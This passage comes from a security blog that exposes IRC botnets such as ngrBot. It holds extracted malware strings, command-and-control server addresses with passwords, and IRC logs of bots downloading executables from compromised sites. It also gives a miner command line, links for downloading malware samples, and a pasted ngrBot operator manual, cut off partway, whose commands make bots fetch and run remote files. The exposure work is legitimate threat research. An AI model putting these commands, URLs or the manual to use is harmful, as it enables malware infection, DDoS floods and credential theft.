/>n%s{%s|%s%s}%s<br /><br><br />admin<br />isadmin<br />%s|%s|%s<br />[DNS]: Redirecting "%s" to "%s"<br />disabled<br />enabled<br />%s|%s<br />[Logins]: Cleared %d logins<br />#user<br />#admin<br />#new<br />removing<br />exiting<br />reconnecting<br />MOTD<br />bsod<br />disable<br />POP3 -> <br />FTP -> <br />[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)<br />dlds<br />http://<br />rebooting<br />[Login]: %s<br />[DNS]: Blocked %d domain(s) - Redirected %d domain(s)<br />[Speed]: Estimated upload speed %d KB/s<br />Software\Microsoft\Windows\CurrentVersion\Run<br />ngrBot<br />running<br />IPC_Check<br />shell\open\command=<br />shell\explore\command=<br />icon=shell32.dll,7<br />useautoplay=1<br />action=Open folder to view files<br />shellexecute=<br />[autorun]<br />.lnk<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />/c "start %%cd%%RECYCLER\%s<br />RECYCLER<br />.inf<br />%s%s<br />\\.\%c:<br />%s\%s<br />%sautorun.tmp<br />%sautorun.inf<br />%c:\<br />gdkWindowToplevelClass<br />%0x.exe<br />comment-text<br />*bebo.*/c/home/ajax_post_lifestream_comment<br />bebo Lifestream<br />*bebo.*/c/profile/comment_post.json<br />bebo Comment<br />Message<br />*bebo.*/mail/MailCompose.jsp*<br />bebo Message<br />*friendster.*/sendmessage.php*<br />Friendster Message<br />comment<br />Friendster Comment<br />shoutout<br />*friendster.*/rpc.php<br />Friendster Shoutout<br />*vkontakte.ru/mail.php<br />vkontakte Message<br />*vkontakte.ru/wall.php<br />vkontakte Wall<br />message<br />*vkontakte.ru/api.php<br />vkontakte Chat<br />text<br />*twitter.*/*direct_messages/new*<br />Twitter Message<br />*twitter.*/*status*/update*<br />Twitter Tweet<br />status<br />*facebook.*/ajax/*MessageComposerEndpoint.php*<br />Facebook Message<br />msg_text<br />*facebook.*/ajax/chat/send.php*<br />Facebook IM<br />-_.!~*'()<br />Content-Length: <br />%s.%s hijacked!<br />MSG %d %s %d<br />MSG %d %1s<br />SDG %d %d<br />Reliability: <br />From: <br />Content-Length: %d<br />X-MMS-IM-Format: <br />SDG %d<br />bmsn<br />%s_0x%08X<br />RegCreateKeyExW<br />RegCreateKeyExA<br />URLDownloadToFileW<br />URLDownloadToFileA<br />PR_Write<br />DnsQuery_W<br />DnsQuery_A<br />InternetWriteFile<br />HttpSendRequestW<br />HttpSendRequestA<br />GetAddrInfoW<br />send<br />CreateFileA<br />MoveFileW<br />MoveFileA<br />DeleteFileW<br />DeleteFileA<br />CopyFileW<br />CopyFileA<br />NtQueryDirectoryFile<br />NtEnumerateValueKey<br />%08x<br />OPEN<br />DnsFree<br />DnsQuery_A<br />DNSAPI.dll<br />FreeContextBuffer<br />InitializeSecurityContextW<br />FreeCredentialsHandle<br />DeleteSecurityContext<br />QueryContextAttributesW<br />AcquireCredentialsHandleW<br />EncryptMessage<br />DecryptMessage<br />InitializeSecurityContextA<br />ApplyControlToken<br />Secur32.dll<br />SHGetSpecialFolderPathW<br />SHGetFileInfoA<br />ShellExecuteA<br />SHELL32.dll<br />InternetCloseHandle<br />InternetReadFile<br />InternetQueryDataAvailable<br />HttpQueryInfoA<br />InternetOpenUrlA<br />InternetOpenA<br />HttpQueryInfoW<br />InternetQueryOptionW<br />WININET<br />.dll<br />PathAppendW<br />StrStrIA<br />PathAppendA<br />PathFindExtensionA<br />SHLWAPI.dll<br />WS2_32.dll<br />memset<br />wcsstr<br />strstr<br />wcsrchr<br />??3@YAXPAX@Z<br />atoi<br />sscanf<br />_strcmpi<br />printf<br />_snprintf<br />sprintf<br />strncpy<br />_memicmp<br />_wcsnicmp<br />_vsnprintf<br />_stricmp<br />strtok<br />strchr<br />_snwprintf<br />??2@YAPAXI@Z<br />_strnicmp<br />isxdigit<br />memmove<br />strncmp<br />toupper<br />strrchr<br />vsprintf<br />isalnum<br />strncat<br />MSVCRT.dll<br />lstrcpyA<br />MoveFileExA<br />lstrcmpA<br />WideCharToMultiByte<br />MoveFileExW<br />lstrcmpW<br />ExitThread<br />MultiByteToWideChar<br />GetFileAttributesA<br />SetFileAttributesW<br />GetFileAttributesW<br />LoadLibraryW<br />CloseHandle<br />SetFileTime<br />CreateFileW<br />GetFileTime<br />GetSystemTimeAsFileTime<br />WriteFile<br />GetModuleHandleW<br />GetLastError<br />ReadFile<br />GetTickCount<br />HeapAlloc<br />GetProcessHeap<br />HeapFree<br />lstrlenA<br />Sleep<br />WriteProcessMemory<br />ReadProcessMemory<br />InitializeCriticalSection<br />LeaveCriticalSection<br />EnterCriticalSection<br />HeapReAlloc<br />SetEvent<br />ConnectNamedPipe<br />CreateNamedPipeA<br />CreateEventA<br />DisconnectNamedPipe<br />GetOverlappedResult<br />WaitForMultipleObjects<br />CreateFileA<br />VirtualFreeEx<br />VirtualAllocEx<br />IsWow64Process<br />CreateRemoteThread<br />OpenProcess<br />WaitForSingleObject<br />ReleaseMutex<br />MapViewOfFile<br />OpenFileMappingA<br />CreateFileMappingA<br />InterlockedIncrement<br />UnmapViewOfFile<br />CreateMutexA<br />GetVersionExA<br />GetModuleFileNameW<br />InterlockedCompareExchange<br />CreateThread<br />GetWindowsDirectoryW<br />DeleteFileW<br />GetTempFileNameW<br />lstrcatW<br />lstrcpynW<br />DeleteFileA<br />SetFileAttributesA<br />lstrcpyW<br />LocalFree<br />LocalAlloc<br />lstrcpynA<br />SetFilePointer<br />DeviceIoControl<br />VirtualAlloc<br />CreateProcessW<br />ExitProcess<br />lstrcatA<br />GetVolumeInformationW<br />GetLocaleInfoA<br />FlushFileBuffers<br />CopyFileW<br />FindClose<br />FindNextFileA<br />FindFirstFileA<br />SetCurrentDirectoryA<br />LockFile<br />GetFileSize<br />CreateDirectoryA<br />GetLogicalDriveStringsA<br />OpenMutexA<br />GetModuleFileNameA<br />GetWindowsDirectoryA<br />KERNEL32.dll<br />MessageBoxA<br />wvsprintfA<br />wsprintfW<br />DefWindowProcA<br />DispatchMessageA<br />TranslateMessage<br />GetMessageA<br />RegisterDeviceNotificationA<br />CreateWindowExA<br />RegisterClassExA<br />USER32.dll<br />CryptGetHashParam<br />CryptDestroyHash<br />CryptHashData<br />CryptReleaseContext<br />CryptCreateHash<br />CryptAcquireContextA<br />AdjustTokenPrivileges<br />LookupPrivilegeValueA<br />OpenProcessToken<br />RegCloseKey<br />RegSetValueExW<br />RegCreateKeyExW<br />RegNotifyChangeKeyValue<br />RegSetValueExA<br />RegOpenKeyExA<br />ADVAPI32.dll<br />CoCreateInstance<br />CoInitialize<br />ole32.dll<br /> n;^<br />Qkkbal<br />i]Wb<br />9a&g<br />MGiI<br />wn>Jj<br />#.zf<br />+o*7<br />!!!!!!!!<br />@@@@@@@@@@@@@@@@@@@@@@<br />@@@@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""<br />@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x<br />lalorlz1.info<br />ROCKR<br />rlz1lola.info<br />ROCKR<br />rlz01jm.info<br />ROCKR<br />#ROCK<br />ngrBot<br />ELPERRO<br />]1.1.0.0<br />CUSTOMER<br />FvLQ49IlzIyLjj6m<br />msn.set<br />msn.int<br />http.set<br />http.int<br />http.inj<br />mdns<br />stats<br />speed<br />logins<br />slow<br />ssyn<br />stop<br />F4XA<br />gGWHXA<br />5hXA<br />ZpXA<br />` WA<br />f0WA<br />u{A<WA<br />[@WA<br />PASS %s<br />[.ShellClassInfo]<br />CLSID={645FF040-5081-101B-9F08-00AA002F954E}<br />USER %s 0 0 :%s<br />NICK %s<br />JOIN %s %s<br />PART %s<br />PRIVMSG %s :%s<br />QUIT :%s<br />PONG %s<br />PING<br />PRIVMSG<br />[v="%s" c="%s" h="%s" p="%S"]<br />[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d<br />[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d<br />[Slowloris]: Starting flood on "%s" for %d minute(s)<br />[Slowloris]: Finished flood on "%s"<br />[UDP]: Starting flood on "%s:%d" for %d second(s)<br />[UDP]: Finished flood on "%s:%d"<br />[SYN]: Starting flood on "%s:%d" for %d second(s)<br />[SYN]: Finished flood on "%s:%d"<br />[USB]: Infected %s<br />[MSN]: Updated MSN spread message to "%s"<br />[MSN]: Updated MSN spread inte<br />rval to "%s"<br />[HTTP]: Updated HTTP spread message to "%s"<br />[HTTP]: Injected value is now %s.<br />[HTTP]: Updated HTTP spread interval to "%s"<br />[Visit]: Visited "%s"<br />[DNS]: Blocked "%s"<br />[usb="%d" msn="%d" http="%d" total="%d"]<br />[ftp="%d" pop="%d" http="%d" total="%d"]<br />[RSOCK4]: Started rsock4 on "%s:%d"<br />[RSOCK4]: Stopped rsock4<br />[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)<br />[d="%s"] Error downloading file [e="%d"]<br />[d="%s"] Error writing download to "%S" [e="%d"]<br />[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]<br />[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]<br />[d="%s"] Error getting temporary filename. [e="%d"]<br />[d='%s"] Error getting application data path [e="%d"]<br />[Visit]: Error visitng "%s"<br />[FTP Login]: %s<br />[POP3 Login]: %s<br />[FTP Infect]: %s was iframed<br />[HTTP Login]: %s<br />[HTTP Traffic]: %s<br />[Ruskill]: Detected File: "%s"<br />[Ruskill]: Detected DNS: "%s"<br />[Ruskill]: Detected Reg: "%s"<br />[PDef+]: %s<br />[DNS]: Blocked DNS "%s"<br />[MSN]: %s<br />[HTTP]: %s<br />ftplog<br />poplog<br />ftpinfect<br />httplogin<br />httptraff<br />ruskill<br />rdns<br />rreg<br />httpspread<br />http://api.wipmania.com/<br />\\.\pipe\%08x_ipc<br />0;0G0O0V0d0n0s0<br />1)13181Y1e1u1|1<br />2C2c2<br />3 363M3j3u3<br />6(6/686J6O6T6m6<br />7 7(7O7V7_7<br />7=8T8\8<br />9#9:9W9^9f9~9<br />98:R:[:<br />;U<e<j<p<<br /><g=o=<br />>*>N><br />?%?/?6?A?P?<br />0<0E0L0S0c0i0t0{0<br />2!3-4d4n4s4<br />5(5:5?5D5a5x5<br />6 6J6a6<br />7&7.7>7I7N7f7<br />1#2_2<br />8"8Q8X8g8q8<br />9':;:Y:<br /><'<1<H<X<x<<br />=%=7=D=K=Z=w=}=<br />>@>R>\>m><br />?1?<?B?j?<br />0g0g1<br />1"2Q2~2<br />203N3<br />424>4^4<br />8;9~9<br />:K:';A;_;<br /><4<><T<^<h<<br />=*=>=D=N=l=u=<br />>#>)>8>>>O>Y>^>p>u><br />?8?L?c?u?<br />0$1-1H1N1_1n1<br />313Y3k3<br />414l4<br />515B5P5u5<br />676V6_6f6v6<br />889Y9r9<br />:-:G:<br />;#;(;2;7;<;A;F;W;<br /><5<?<^<<br /><W=l=|=<br />=d>o>{><br />?/?U?`?p?<br />1P2T2X2<br />3?4a4h4<br />5A5H5|5<br />7U8]8f8}8<br />9'9-939q9<br />: :%:n:<br />;1;J;d;<br /><%<3<<<B<i<v<<br />=$=+=0===E=L=T=o=v=<br />=6>E><br />?%?4?\?<br />0'0K0\0s0x0}0<br />091M1g1t1<br />3[3q3<br />3*494<br />4-575w5~5<br />5B6L6<br />6(7I7]7z7<br />848_9m9w9<br />:+:1:7:D:Q:V:e:t:<br />; ;,;8;L;Q;V;n;s;x;};<br />;5<B<]<w<<br />=5===B=N=S=g=l=<br />5"6-6B6L6Q6c6u6<br />7 70767=7L7R7<br />94:{:<br />'010<br />1.1F1^1<br />2(2>2P2b2t2<br />4K5f5<br />6=6K6Y6<br />7*7/7L7S7r7<br />8]8i8<br />9+9;9A9G9d9q9w9}9<br />9/:b:h:<br />;!;S;`;h;s;<br />;E<e<w<<br />=.=<=A=F=L=R=k=u=<br />>#>,>X><br />?-?\?y?<br />42484T4`4f4<br />4X5]5|5<br />6-646D6Q6[6b6g6q6z6<br />9 9&9<9G9R9W9\9q9v9<br />9::G:M:b:j:z:<br />;.;6;;;B;H;S;c;k;<br /><+<F<T<`<<br />=3=E=Q=<br />>3>T>k>z><br />?Z?r?{?<br />%0<0V0h0<br />141>1l1<br />3g3r3<br />3\4c4<br />5*585R5w5<br />6!6<6R6a6<br />7=7C7T7g7z7<br />8-9L9w9<br />9-:D:W:<br />;#;4;:;T;Z;<br /><#<(<-<2<7<P<j<w<<br />=)=.=K=[=`=}=<br />>+>I>V>[>s>z><br />?*?H?T?a?g?u?<br />0,0J0Z0g0l0v0<br />1%101=1C1I1W1s1y1<br />2'212<2J2_2<br />3"3@3P3V3<br />4)4J4h4x4<br />535Q5s5<br />6!6.656D6S6`6m6z6<br />7?7E7<br />7'8,818[8w8<br />8.9K9V9s9<br />:':,:D:T:Y:r:<br />;2;7;W;r;w;|;<br /><$<5<<<F<N<b<<br />=(=I=O=Z=r=|=<br />>V>g>|><br />>#?h?<br />0-070D0x0<br />0@1G1<br />132D2Z2p2<br />3*343=3R3^3<br />3-434=4F5P5]5<br />536N6[6<br />637B7U7d7q7<br />818>8T8]8|8<br />9T9`9o9u9z9<br />:!:,:3:;:A:O:Y:f:l:r:<br />;(;3;9;?;Q;];c;i;{;<br /><&<3<8<G<T<Z<`<n<<br /><,=3=A=G=W=w=|=<br />>@>E>\><br />>W?`?<br />010C0H0M0a0f0k0<br />1 1$1<1M1U1<br />1-2O2z2<br />3I3Z3o3z3<br />4"4'4<4U4_4t4z4<br />575=5r5|5<br />6(6=6P6m6z6<br />7 767<7~7<br />8A8F8Y8c8j8<br />999C9<br />:%:,:3:=:F:e:<br />;+;=;D;X;];c;i;n;<br />;.<4<;<@<e<p<w<<br />="=*=0=;=F=O=Z=b=g=v={=<br />=7>N>W>]><br />>&?7?~?<br />40;0A0Q0a0<br />2)2A2[2<br />2T3]3f5<br />6F6Y6t6<br />7I7Y7_7e7k7q7w7}7<br />8*808;8~8<br />9 9O9X9^9<br />9$:0:Q:<br />:&;2;8;F;<br /><"<2<=<Q<W<i<<br />=$=*=4=:=E=K=S=e=<br />>;>I><br />?!?F?M?W?<br />1$1<1I1[1g1<br />2%2>2V2a2t2|2<br />373E3M3a3l3<br />3@4N4U4<br />5/565<5R5k5<br />666i6<br />7.7M7<br />8,818M8[8`8<br />8?9R9<br />:#:4:9:?:E:P:{:<br />;#;B;U;[;b;r;<br /><!<o<<br />=$=;=C=N=S=X=i=n=s=}=<br />>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|><br />?B?H?N?T?Z?`?f?l?r?x?~?<br />4 4$4(4,4044484<4@4D4H4L4P4T4X6\6`6h6l6p6t6x6|6<br />7D7L7X7\7`7d7h7l7p7t7<br />9(949@9L9X9d9p9|9<br />:$:0:<:H:T:`:l:x:<br />; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;<br />4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4<br />5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5<br />6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6<br />7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7<br />8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8<br />8 9,989D9P9\9h9x9|9<br />: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:<br />; ;$;(;,;0;8;<;@;D;H;P;T;X;\;`;h;l;p;t;x;<br />< <(<,<0<4<8<@<D<H<L<P<X<\<`<d<h<p<t<|<<br />=(=0=8=@=H=T=\=d=l=<br /><br />Unicode Strings:<br />---------------------------------------------------------------------------<br />Ajjj<br />jjjj<br />jjjj<br />jjjj<br />$jjj<br />Ajjj<br />DBWIN<br />\\.\pipe<br />kernel32.dll<br />ntdll.dll<br />Internet Explorer\iexplore.exe<br />autorun.inf<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />flock.ex<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />iexplore.exe<br />firefox.exe<br />HKCU\<br />HKLM\<br />Microsoft Unified Security Protocol Provider<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />l"%s" %S<br />POST<br />.exe<br />lol.exe<br />n127.0.0.1<br />%s:Zone.Identifier<br />wininet.dll<br />secur32.dll<br />ws2_32.dll<br />:%S%S\Desktop.ini<br />winlogon.exe<br />explorer.exe<br />Aadvapi32.dll<br />urlmon.dll<br />nspr4.dll<br />dnsapi.dll<br />Akernel23.dll<br />y%s\%s.exe<br />lsass.exe<br />Shell<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /><br /></code></pre><br />we have 2 new domains here<br /><br />rlz01jm.info not active yet <br />rlz1lola.info active <br />lalorlz1.info this is old domain allready posted in my blog<br /><br />Resolved : [rlz1lola.info] To [176.9.192.215]<br /><br />176.9.192.216 5236 PASS ROCKR Botnet server here<br />176.9.192.215 5236 PASS ROCKR Botnet server here<br /><br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita"<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 16 domain(s)<br />PRIVMSG #ROCK :[d="http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0<br />NICK n{US|XPa}eovvenu<br />USER eovvenu 0 0 :eovvenu<br />JOIN #ROCK ngrBot<br />JOIN #rockspread<br />JOIN #US<br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "4"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "4"<br /><br /><br />Now talking in #ROCK<br />Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]<br />Topic By: [ rockstar ]<br /><br />Download samples <a href="http://de071be5.ultrafiles.net">here</a> and <a href="http://megaupper.com/files/FKCXKFYD/samples.zip">here</a><br /><a href="http://www.mirrorcreator.com/files/1TLFUITT/samples.zip_links">Download</a><br /><br />hosting infos<br />http://whois.domaintools.com/176.9.192.215<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4916922528997001143?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-38295565976224315832012-01-31T18:42:00.000+01:002012-01-31T18:42:39.264+01:0031.31.76.89(irc botnet hosted in Czech Republic Wedos Internet A.s)Remote Host Port Number<br />31.31.76.89 6667<br /><br />PONG :A55A8CFA<br />JOIN #blackout<br /><br />Now talking in #blackout<br />Topic On: [ #blackout ] [ #blackout ]<br />Topic By: [ JohnDoe ]<br />Modes On: [ #blackout ] [ +sntru ]<br /><br />hosting infos:<br />http://whois.domaintools.com/31.31.76.89<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3829556597622431583?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-22265876695248470412012-01-31T18:34:00.000+01:002012-01-31T18:34:25.956+01:0046.166.162.116(irc botnet hosted in United Kingdom Santrex Internet Services Ltd)46.166.162.116:8585<br /><br />nick yycIaIc<br />user yudtouga<br /><br />channel #c<br /><br />Now talking in #c<br />Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ]<br />Topic By: [ rise ]<br /><br />hosting infos:<br />http://whois.domaintools.com/46.166.162.116<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2226587669524847041?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-62657362765430490912012-01-28T21:39:00.000+01:002012-01-28T21:39:34.668+01:00pool.dload.asia(Bitcoin Miner Botnet hosted in France Paris Gandi)Very big net here<br />the gay behind the net is making alot of money from infected machines<br /><br />Resolved : [pool.dload.asia] To [95.142.174.210]<br />Resolved : [pool.dload.asia] To [92.243.3.252]<br />Resolved : [pool.dload.asia] To [95.142.175.27]<br />Resolved : [pool.dload.asia] To [95.142.161.74]<br />Resolved : [pool.dload.asia] To [95.142.174.205]<br />Resolved : [pool.dload.asia] To [95.142.170.142]<br />Resolved : [pool.dload.asia] To [95.142.174.64]<br />Resolved : [pool.dload.asia] To [92.243.23.149]<br />Resolved : [pool.dload.asia] To [95.142.164.83]<br /><br />miner.exe -a 60 -g yes -o http://pool.dload.asia:8332/ -u redem_check -p orneliassssssssss<br /><br />Default file<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>{<br />"error": null,<br />"id": 1,<br />"result": {<br />"data": "0000000109493c65b0e150acd82397509a089d4b14bf209eb495e68d000007ca000000008e1dee82be4fd4caf0895d685a2c0d06c893f80fbfe007188bf829fcffa39f214f244f611a0cd43f00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000",<br />"hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000",<br />"midstate": "a9bd1362c454c1d5018d6520d1ae43715b8a5fa336bdb902be4a5269a946f1b7",<br />"target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000"<br />}<br />}<br /></code></pre><br />exe file<br /><a href="http://5c212ab5.urlbeat.net">Download</a><br /><br />hosting infos:<br />http://whois.domaintools.com/95.142.164.83<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6265736276543049091?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-55898990673682972582012-01-27T22:16:00.000+01:002012-01-27T22:16:08.831+01:00sukipuki4mokimoki.in(winlocker hosted in United States Clarks Summit Volumedrive)<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-6LVR-jPsJeo/TyMRzu3Iz_I/AAAAAAAAAMM/3m1wDKCoqD4/s1600/winlocker.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="192" width="320" src="http://4.bp.blogspot.com/-6LVR-jPsJeo/TyMRzu3Iz_I/AAAAAAAAAMM/3m1wDKCoqD4/s320/winlocker.png" /></a></div><br />HTTP Query Text<br /><br />sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1<br />sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1<br /><br />Suspicious Actions Detected<br />Copies self to other locations<br />Creates autorun records<br />Injects code into other processes<br /><br />exe file<br /><a href="http://087ef69e.whackyvidz.com">Download</a><br /><a href="http://f1128d34.urlbeat.net">Download</a><br /><br />hosting infos:<br />http://whois.domaintools.com/199.168.139.53<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5589899067368297258?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-37146301988356213192012-01-26T00:02:00.000+01:002012-01-26T00:02:56.183+01:0074.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)Remote Host Port Number<br />199.15.234.7 80<br />203.249.66.5 80<br />74.63.232.209 5236 PASS ROCKR<br /><br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD"<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 12 domain(s)<br />NICK n{US|XPa}tkdjljt<br />USER tkdjljt 0 0 :tkdjljt<br />JOIN #ROCK ngrBot<br />JOIN #rockspread<br />JOIN #US<br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/74.63.232.209<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3714630198835621319?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-37065796893278575112012-01-25T23:41:00.000+01:002012-01-25T23:41:28.681+01:00ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)Resolved : [ch1mb4.info] To [74.62.155.207]<br /><br />C&C Server: 74.62.155.207:6060<br />Server Password: <br />Username: uamethp<br />Nickname: n{DE|XPa}uamethp<br />Channel: #hell (Password: secret) <br />Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt<br /><br />hosting infos:<br />http://whois.domaintools.com/74.62.155.207<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3706579689327857511?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-31613290901881792822012-01-23T22:59:00.000+01:002012-01-23T22:59:08.823+01:0064.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)Older version of ngrBot with the original manual included<br /><br />Remote Host Port Number<br />199.15.234.7 80<br />64.186.134.161 7834 PASS puto<br /><br />NICK n{US|XPa}civmqel<br />USER civmqel 0 0 :civmqel<br />JOIN #dr3 ngrBot<br /><br />Now talking in #dr3<br />Topic On: [ #dr3 ] [ << #s (spreads), #f (ftps) , #l (formgrabber) , #p (pdef) , #r (ruskill) , #s (spreads) >> Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]<br />Topic By: [ root3d ]<br />(root3d) /lusers<br /><br />topic says everything u have to know about ngrBot lol<br /><br />here i m including the manual just in case he delete it<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Commands:<br />#p - pdef(also known as the botkiller/protection)<br />#r - ruskill(shows what bots you ruskilled (when selling installs you use to keep your bots)<br />#f - ftps<br />#l - formgrabber logins<br />#s - usb, msn, facebook<br /><br />Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.<br /><br /> !dl [url] <md5> <-r> <-n><br /><br /> The bot downloads and executes a file from the specified URL.<br /><br /> Parameters<br /> url URL of the file to download and execute<br /> md5 optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot<br /> -r Enable RusKill on downloaded file<br /> -n Disables PDef+ on the system until reboot or until it is manually re-enabled<br /><br /> Example<br /><br /> [00:00:00] <You> !dl http://example.com/test.exe<br /> [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/test.exe" s="94208 bytes"] Executed file "C:\Users\Administrator\AppData\Roaming\ABCD.tmp"<br /> [00:00:10] <You> !dl http://example.com/bot.exe -r<br /> [00:00:15] <{RU|W7a}abcdefg> [d="http://example.com/bot.exe" s="188416 bytes"] Executed file "C:\Users\Administrator\AppData\Roaming\1234.tmp"<br /> [00:00:15] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:\Documents and Settings\Administrator\Application Data\1234.tmp"<br /> [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lsass.exe"<br /> [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected Reg: "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"<br /> [00:00:17] <{RU|W7a}abcdefg> [Ruskill]: Detected DNS: "cnc.example.com"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !up [url] [md5] <-r><br /><br /> The bot updates its file, but the update does not take effect until the system is restarted.<br /><br /> Parameters<br /> url URL of the file to update to<br /> md5 MD5 hash of the update file<br /> -r Reboot immediately<br /><br /> Example<br /><br /> [00:00:00] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57<br /> [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="87040 bytes"] Update error: MD5 mismatch (857526760C0E67BB502B7183DEE52767 != 58050954C432B8786284C4E0C7011A57)<br /> [00:00:15] <You> !up 